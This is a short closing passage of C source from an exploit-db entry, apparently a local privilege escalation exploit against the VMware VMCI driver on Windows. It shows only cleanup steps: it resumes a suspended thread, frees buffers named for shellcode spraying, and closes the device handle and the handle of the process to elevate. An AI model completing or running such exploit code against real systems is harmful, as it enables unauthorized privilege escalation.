                    ResumeThread(hSuspThread);
                }
            }
            else
            {
                printf("[-] Not this time %d\n", GetLastError());
            }

            if (pShellSprayBufStd != NULL)
            {
                VirtualFree(pShellSprayBufStd, 0, MEM_RELEASE);
            }

            if (pShellSprayBufQtd != NULL)
            {
                VirtualFree(pShellSprayBufQtd, 0, MEM_RELEASE);
            }
        }

        SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_NORMAL);
        CloseHandle(hVMCIDevice);
    }
    else
    {
        printf("[-] Like I don't see vmware here\n");
    }

    CloseHandle(hProcessToElevate);

    return;
}

Source: https://www.exploit-db.com/exploits/40164/